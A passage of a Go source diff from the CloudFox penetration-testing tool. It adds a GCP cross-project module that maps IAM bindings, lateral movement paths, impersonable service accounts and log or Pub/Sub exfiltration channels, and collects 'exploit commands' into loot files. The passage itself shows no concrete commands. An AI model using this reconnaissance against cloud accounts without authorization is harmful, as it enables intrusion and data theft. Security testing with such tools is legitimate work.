+ } + } + } + return url +} + +func (m *CostSecurityModule) parseMachineType(machineType string) (vcpus int64, memGB float64) { + // Common machine type patterns + // n1-standard-4: 4 vCPUs, 15 GB + // e2-medium: 2 vCPUs, 4 GB + // custom-8-32768: 8 vCPUs, 32 GB + + switch { + case strings.HasPrefix(machineType, "custom-"): + // Parse custom machine type + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[1], "%d", &vcpus) + var memMB int64 + fmt.Sscanf(parts[2], "%d", &memMB) + memGB = float64(memMB) / 1024 + } + case strings.HasPrefix(machineType, "n1-"): + vcpuMap := map[string]int64{ + "n1-standard-1": 1, "n1-standard-2": 2, "n1-standard-4": 4, + "n1-standard-8": 8, "n1-standard-16": 16, "n1-standard-32": 32, + "n1-standard-64": 64, "n1-standard-96": 96, + "n1-highmem-2": 2, "n1-highmem-4": 4, "n1-highmem-8": 8, + "n1-highmem-16": 16, "n1-highmem-32": 32, "n1-highmem-64": 64, + "n1-highcpu-2": 2, "n1-highcpu-4": 4, "n1-highcpu-8": 8, + "n1-highcpu-16": 16, "n1-highcpu-32": 32, "n1-highcpu-64": 64, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 3.75 // Standard ratio + case strings.HasPrefix(machineType, "e2-"): + vcpuMap := map[string]int64{ + "e2-micro": 2, "e2-small": 2, "e2-medium": 2, + "e2-standard-2": 2, "e2-standard-4": 4, "e2-standard-8": 8, + "e2-standard-16": 16, "e2-standard-32": 32, + "e2-highmem-2": 2, "e2-highmem-4": 4, "e2-highmem-8": 8, + "e2-highmem-16": 16, + "e2-highcpu-2": 2, "e2-highcpu-4": 4, "e2-highcpu-8": 8, + "e2-highcpu-16": 16, "e2-highcpu-32": 32, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 4 // Approximate + case strings.HasPrefix(machineType, "n2-") || strings.HasPrefix(machineType, "n2d-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + case strings.HasPrefix(machineType, "c2-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + default: + vcpus = 2 + memGB = 4 + } + + return vcpus, memGB +} + +func (m *CostSecurityModule) estimateInstanceCost(machineType string, vcpus int64, memGB float64, gpuCount int) float64 { + // Rough monthly estimates based on on-demand pricing in us-central1 + // Actual costs vary by region and commitment + + baseCost := float64(vcpus)*25 + memGB*3 // Rough per-vCPU and per-GB costs + + // GPU costs (rough estimates) + if gpuCount > 0 { + baseCost += float64(gpuCount) * 400 // ~$400/month per GPU + } + + // Adjust for machine type efficiency + if strings.HasPrefix(machineType, "e2-") { + baseCost *= 0.7 // E2 is cheaper + } else if strings.HasPrefix(machineType, "c2-") { + baseCost *= 1.2 // C2 is more expensive + } + + return baseCost +} + +func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) float64 { + // Rough monthly estimates per GB + // pd-standard: $0.04/GB, pd-ssd: $0.17/GB, pd-balanced: $0.10/GB + + pricePerGB := 0.04 + if strings.Contains(diskType, "ssd") { + pricePerGB = 0.17 + } else if strings.Contains(diskType, "balanced") { + pricePerGB = 0.10 + } + + return float64(sizeGB) * pricePerGB +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CostSecurityModule) initializeLootFiles() { + m.LootMap["cost-security-commands"] = &internal.LootFile{ + Name: "cost-security-commands", + Contents: "# Cost Security Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CostSecurityModule) buildTables() []internal.TableFile { + // Main cost-security table (combines cryptomining, orphaned, and anomalies) + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators + for _, c := range m.Cryptomining { + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources + for _, o := range m.Orphaned { + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies + for _, a := range m.CostAnomalies { + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + + // Add remediation to loot + if a.Remediation != "" { + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# %s\n"+ + "%s\n\n", + strings.ToUpper(a.AnomalyType), a.Name, + a.ProjectID, a.Details, a.Remediation, + ) + } + } + + // Expensive Resources table (keep separate due to different structure) + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Build tables + var tables []internal.TableFile + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security-expensive", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + return tables +} + +func (m *CostSecurityModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *CostSecurityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID from hierarchy + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = CostSecurityOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 { + outputData.ProjectLevelData[projectID] = CostSecurityOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = CostSecurityOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *CostSecurityModule) buildTablesForProject(projectID string) []internal.TableFile { + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators for this project + for _, c := range m.Cryptomining { + if c.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources for this project + for _, o := range m.Orphaned { + if o.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies for this project + for _, a := range m.CostAnomalies { + if a.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + } + + // Expensive Resources for this project + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + if e.ProjectID != projectID { + continue + } + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Build tables + var tables []internal.TableFile + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "expensive-resources", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + return tables +} + +func (m *CostSecurityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := CostSecurityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go new file mode 100644 index 00000000..d0fd1e62 --- /dev/null +++ b/gcp/commands/crossproject.go @@ -0,0 +1,662 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + crossprojectservice "github.com/BishopFox/cloudfox/gcp/services/crossProjectService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCrossProjectCommand = &cobra.Command{ + Use: globals.GCP_CROSSPROJECT_MODULE_NAME, + Aliases: []string{"cross-project", "xproject"}, + Short: "Analyze cross-project access patterns for lateral movement", + Long: `Analyze cross-project access patterns to identify lateral movement paths and data flows. + +This module is designed for penetration testing and identifies: +- Service accounts with access to multiple projects +- Cross-project IAM role bindings +- Potential lateral movement paths between projects +- Cross-project logging sinks (data exfiltration via logs) +- Cross-project Pub/Sub exports (data exfiltration via messages) +- Impersonation targets (which SAs can be impersonated in target projects) + +Features: +- Maps cross-project service account access +- Identifies cross-project roles (owner, editor, admin) +- Discovers logging sinks sending logs to other projects +- Discovers Pub/Sub subscriptions exporting to other projects (BQ, GCS, push) +- Generates exploitation commands for lateral movement +- Highlights service accounts spanning trust boundaries +- Shows impersonation targets (run foxmapper first for attack path analysis) + +RECOMMENDED: For comprehensive cross-project analysis, use -A to analyze all accessible projects: + + cloudfox gcp crossproject -A + +This will: +- Use cached org/folder/project data (auto-populated, refreshes every 24h) +- Analyze cross-project patterns across all accessible projects +- Show "Trust Boundary" column indicating if target is Internal, External, or Unknown + +TRUST BOUNDARY COLUMN: +- "Internal" - Target project is within your organization +- "External" - Target project is outside your organization (trust boundary crossing!) +- "Unknown" - Cannot determine boundary + +ALTERNATIVE: Specify projects manually with -l for a project list file: + + cloudfox gcp crossproject -l projects.txt + +TIP: Run foxmapper first to populate the Attack Paths column. + +WARNING: Requires multiple projects to be specified for effective analysis. +Single project analysis (-p) will have limited results.`, + Run: runGCPCrossProjectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CrossProjectModule struct { + gcpinternal.BaseGCPModule + + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + CrossProjectSinks []crossprojectservice.CrossProjectLoggingSink + CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport + LootMap map[string]*internal.LootFile + FoxMapperCache *gcpinternal.FoxMapperCache + OrgCache *gcpinternal.OrgCache +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CrossProjectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CrossProjectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CrossProjectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CROSSPROJECT_MODULE_NAME) + if err != nil { + return + } + + if len(cmdCtx.ProjectIDs) < 2 { + cmdCtx.Logger.InfoM("Cross-project analysis works best with multiple projects. Consider using -l to specify a project list.", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + module := &CrossProjectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CrossBindings: []crossprojectservice.CrossProjectBinding{}, + CrossProjectSAs: []crossprojectservice.CrossProjectServiceAccount{}, + LateralMovementPaths: []crossprojectservice.LateralMovementPath{}, + CrossProjectSinks: []crossprojectservice.CrossProjectLoggingSink{}, + CrossProjectPubSub: []crossprojectservice.CrossProjectPubSubExport{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + // Get org cache from context (auto-loaded at startup) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + svc := crossprojectservice.New() + + // Analyze cross-project bindings + bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs, m.OrgCache) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not analyze cross-project access") + } else { + m.CrossBindings = bindings + } + + // Get cross-project service accounts + sas, err := svc.GetCrossProjectServiceAccounts(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not get cross-project service accounts") + } else { + m.CrossProjectSAs = sas + } + + // Find lateral movement paths + paths, err := svc.FindLateralMovementPaths(m.ProjectIDs, m.OrgCache) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find lateral movement paths") + } else { + m.LateralMovementPaths = paths + } + + // Find cross-project logging sinks + sinks, err := svc.FindCrossProjectLoggingSinks(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find cross-project logging sinks") + } else { + m.CrossProjectSinks = sinks + } + + // Find cross-project Pub/Sub exports + pubsubExports, err := svc.FindCrossProjectPubSubExports(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find cross-project Pub/Sub exports") + } else { + m.CrossProjectPubSub = pubsubExports + } + + if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 && + len(m.CrossProjectSinks) == 0 && len(m.CrossProjectPubSub) == 0 { + logger.InfoM("No cross-project access patterns found", globals.GCP_CROSSPROJECT_MODULE_NAME) + return + } + + // Add findings to loot + for _, binding := range m.CrossBindings { + m.addBindingToLoot(binding) + } + + for _, sa := range m.CrossProjectSAs { + m.addServiceAccountToLoot(sa) + } + + for _, path := range m.LateralMovementPaths { + m.addLateralMovementToLoot(path) + } + + for _, sink := range m.CrossProjectSinks { + m.addLoggingSinkToLoot(sink) + } + + for _, export := range m.CrossProjectPubSub { + m.addPubSubExportToLoot(export) + } + + logger.SuccessM(fmt.Sprintf("Found %d binding(s), %d SA(s), %d lateral path(s), %d logging sink(s), %d pubsub export(s)", + len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths), + len(m.CrossProjectSinks), len(m.CrossProjectPubSub)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CrossProjectModule) initializeLootFiles() { + m.LootMap["crossproject-commands"] = &internal.LootFile{ + Name: "crossproject-commands", + Contents: "# Cross-Project Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { + // Only add if there are exploitation commands + if len(binding.ExploitCommands) > 0 { + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s -> %s (%s)\n"+ + "# =============================================================================\n", + m.GetProjectName(binding.SourceProject), + m.GetProjectName(binding.TargetProject), + cleanRole(binding.Role), + ) + m.LootMap["crossproject-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + for _, cmd := range binding.ExploitCommands { + m.LootMap["crossproject-commands"].Contents += cmd + "\n" + } + m.LootMap["crossproject-commands"].Contents += "\n" + } +} + +func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { + // Skip - service account cross-project access is covered by bindings and lateral movement paths + // Adding separate impersonation commands would be redundant +} + +func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { + // Only add if there are exploitation commands + if len(path.ExploitCommands) > 0 { + // Clean up role names for display + var cleanedRoles []string + for _, r := range path.TargetRoles { + cleanedRoles = append(cleanedRoles, cleanRole(r)) + } + + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s -> %s (%s)\n"+ + "# =============================================================================\n", + m.GetProjectName(path.SourceProject), + m.GetProjectName(path.TargetProject), + strings.Join(cleanedRoles, ", "), + ) + m.LootMap["crossproject-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + for _, cmd := range path.ExploitCommands { + m.LootMap["crossproject-commands"].Contents += cmd + "\n" + } + m.LootMap["crossproject-commands"].Contents += "\n" + } +} + +func (m *CrossProjectModule) addLoggingSinkToLoot(sink crossprojectservice.CrossProjectLoggingSink) { + // Logging sinks are data exports, not direct exploitation paths + // Skip adding to loot - the table output is sufficient +} + +func (m *CrossProjectModule) addPubSubExportToLoot(export crossprojectservice.CrossProjectPubSubExport) { + // Pub/Sub exports are data exports, not direct exploitation paths + // Skip adding to loot - the table output is sufficient +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CrossProjectModule) getHeader() []string { + return []string{ + "Source Project", + "Source Type", + "Source Principal", + "Binding Type", + "Target Project", + "Target Type", + "Target Principal", + "Target Role", + "Attack Path", + "Trust Boundary", + } +} + +// getTargetProjectScope returns the scope of the target project relative to the org +func (m *CrossProjectModule) getTargetProjectScope(targetProjectID string) string { + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + return "Unknown" + } + return m.OrgCache.GetProjectScope(targetProjectID) +} + +// getImpersonationTarget checks if a role grants impersonation capabilities and returns the target +// Returns (targetType, targetPrincipal) - both "-" if no impersonation target found +func (m *CrossProjectModule) getImpersonationTarget(principal, role, targetProject string) (string, string) { + // Roles that grant impersonation capabilities + impersonationRoles := map[string]bool{ + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "iam.serviceAccountTokenCreator": true, + "iam.serviceAccountKeyAdmin": true, + } + + cleanedRole := cleanRole(role) + + // Check if this is an impersonation role + if !impersonationRoles[role] && !impersonationRoles[cleanedRole] && + !strings.Contains(cleanedRole, "serviceAccountTokenCreator") && + !strings.Contains(cleanedRole, "serviceAccountKeyAdmin") { + return "-", "-" + } + + // FoxMapper handles impersonation differently via graph edges + // Since we no longer use AttackPathCache, we rely on FoxMapper or show a generic message + + // No specific targets found in cache - this likely means the role was granted at the + // project level (not on specific SAs), which means ALL SAs in the target project can be impersonated + return "Service Account", fmt.Sprintf("All SAs in %s", m.GetProjectName(targetProject)) +} + +// getPrincipalTypeDisplay returns a human-readable type for the principal +func getPrincipalTypeDisplay(principal string) string { + if strings.HasPrefix(principal, "serviceAccount:") { + return "Service Account" + } else if strings.HasPrefix(principal, "user:") { + return "User" + } else if strings.HasPrefix(principal, "group:") { + return "Group" + } else if strings.HasPrefix(principal, "domain:") { + return "Domain" + } + return "Unknown" +} + +// cleanPrincipal removes common prefixes from principal strings for cleaner display +func cleanPrincipal(principal string) string { + // Remove serviceAccount:, user:, group: prefixes + principal = strings.TrimPrefix(principal, "serviceAccount:") + principal = strings.TrimPrefix(principal, "user:") + principal = strings.TrimPrefix(principal, "group:") + principal = strings.TrimPrefix(principal, "domain:") + return principal +} + +// cleanRole extracts just the role name from a full role path +func cleanRole(role string) string { + // Handle full project paths like "projects/project-id/roles/customRole" + if strings.Contains(role, "/roles/") { + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + return parts[1] + } + } + // Handle standard roles like "roles/compute.admin" + if strings.HasPrefix(role, "roles/") { + return strings.TrimPrefix(role, "roles/") + } + return role +} + +// extractCrossProjectResourceName extracts just the resource name from a full resource path +func extractCrossProjectResourceName(path string) string { + // Handle various path formats + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} + +// getAttackPathForTarget returns attack path summary for a principal accessing a target project +func (m *CrossProjectModule) getAttackPathForTarget(targetProject, principal string) string { + // Clean principal for lookup + cleanedPrincipal := cleanPrincipal(principal) + + // Check if this is a service account + if strings.Contains(cleanedPrincipal, "@") && strings.Contains(cleanedPrincipal, ".iam.gserviceaccount.com") { + return gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, cleanedPrincipal) + } + + return "-" +} + +func (m *CrossProjectModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +// buildTableBodyByTargetProject builds table bodies grouped by target project +// Returns a map of targetProjectID -> [][]string (rows for that target project) +func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]string { + bodyByProject := make(map[string][][]string) + + // Add cross-project bindings + for _, binding := range m.CrossBindings { + principalType := getPrincipalTypeDisplay(binding.Principal) + principal := cleanPrincipal(binding.Principal) + role := cleanRole(binding.Role) + attackPath := m.getAttackPathForTarget(binding.TargetProject, binding.Principal) + targetType, targetPrincipal := m.getImpersonationTarget(binding.Principal, binding.Role, binding.TargetProject) + trustBoundary := m.getTargetProjectScope(binding.TargetProject) + + row := []string{ + m.GetProjectName(binding.SourceProject), + principalType, + principal, + "IAM Binding", + m.GetProjectName(binding.TargetProject), + targetType, + targetPrincipal, + role, + attackPath, + trustBoundary, + } + bodyByProject[binding.TargetProject] = append(bodyByProject[binding.TargetProject], row) + } + + // Add cross-project service accounts + for _, sa := range m.CrossProjectSAs { + for _, access := range sa.TargetAccess { + parts := strings.SplitN(access, ": ", 2) + targetProject := "" + role := access + if len(parts) == 2 { + targetProject = parts[0] + role = parts[1] + } + + role = cleanRole(role) + attackPath := m.getAttackPathForTarget(targetProject, "serviceAccount:"+sa.Email) + targetType, targetPrincipal := m.getImpersonationTarget(sa.Email, role, targetProject) + trustBoundary := m.getTargetProjectScope(targetProject) + + row := []string{ + m.GetProjectName(sa.ProjectID), + "Service Account", + sa.Email, + "IAM Binding", + m.GetProjectName(targetProject), + targetType, + targetPrincipal, + role, + attackPath, + trustBoundary, + } + bodyByProject[targetProject] = append(bodyByProject[targetProject], row) + } + } + + // Add lateral movement paths + for _, path := range m.LateralMovementPaths { + for _, role := range path.TargetRoles { + principalType := getPrincipalTypeDisplay(path.SourcePrincipal) + principal := cleanPrincipal(path.SourcePrincipal) + cleanedRole := cleanRole(role) + attackPath := m.getAttackPathForTarget(path.TargetProject, path.SourcePrincipal) + targetType, targetPrincipal := m.getImpersonationTarget(path.SourcePrincipal, role, path.TargetProject) + trustBoundary := m.getTargetProjectScope(path.TargetProject) + + row := []string{ + m.GetProjectName(path.SourceProject), + principalType, + principal, + path.AccessMethod, + m.GetProjectName(path.TargetProject), + targetType, + targetPrincipal, + cleanedRole, + attackPath, + trustBoundary, + } + bodyByProject[path.TargetProject] = append(bodyByProject[path.TargetProject], row) + } + } + + // Add logging sinks - these are resources, not principals + for _, sink := range m.CrossProjectSinks { + dest := sink.DestinationType + if sink.Filter != "" { + filter := sink.Filter + if len(filter) > 30 { + filter = filter[:27] + "..." + } + dest = fmt.Sprintf("%s (%s)", sink.DestinationType, filter) + } + trustBoundary := m.getTargetProjectScope(sink.TargetProject) + + row := []string{ + m.GetProjectName(sink.SourceProject), + "Logging Sink", + sink.SinkName, + "Data Export", + m.GetProjectName(sink.TargetProject), + "-", + "-", + dest, + "-", + trustBoundary, + } + bodyByProject[sink.TargetProject] = append(bodyByProject[sink.TargetProject], row) + } + + // Add Pub/Sub exports - these are resources, not principals + for _, export := range m.CrossProjectPubSub { + dest := export.ExportType + if export.ExportDest != "" { + destName := extractCrossProjectResourceName(export.ExportDest) + dest = fmt.Sprintf("%s: %s", export.ExportType, destName) + } + trustBoundary := m.getTargetProjectScope(export.TargetProject) + + row := []string{ + m.GetProjectName(export.SourceProject), + "Pub/Sub", + export.SubscriptionName, + "Data Export", + m.GetProjectName(export.TargetProject), + "-", + "-", + dest, + "-", + trustBoundary, + } + bodyByProject[export.TargetProject] = append(bodyByProject[export.TargetProject], row) + } + + return bodyByProject +} + +func (m *CrossProjectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For crossproject, output at project level grouped by TARGET project + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + header := m.getHeader() + bodyByProject := m.buildTableBodyByTargetProject() + lootFiles := m.collectLootFiles() + + // Create output for each target project + for targetProject, body := range bodyByProject { + if len(body) == 0 { + continue + } + + tables := []internal.TableFile{ + { + Name: "crossproject", + Header: header, + Body: body, + }, + } + + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, // Loot files are shared across all projects + } + + outputData.ProjectLevelData[targetProject] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *CrossProjectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() + bodyByProject := m.buildTableBodyByTargetProject() + lootFiles := m.collectLootFiles() + + // Write output for each target project separately + isFirstProject := true + for targetProject, body := range bodyByProject { + if len(body) == 0 { + continue + } + + tables := []internal.TableFile{ + { + Name: "crossproject", + Header: header, + Body: body, + }, + } + + // Only include loot files on the first project to avoid duplicate writes + var projectLoot []internal.LootFile + if isFirstProject { + projectLoot = lootFiles + isFirstProject = false + } + + output := CrossProjectOutput{ + Table: tables, + Loot: projectLoot, + } + + err := 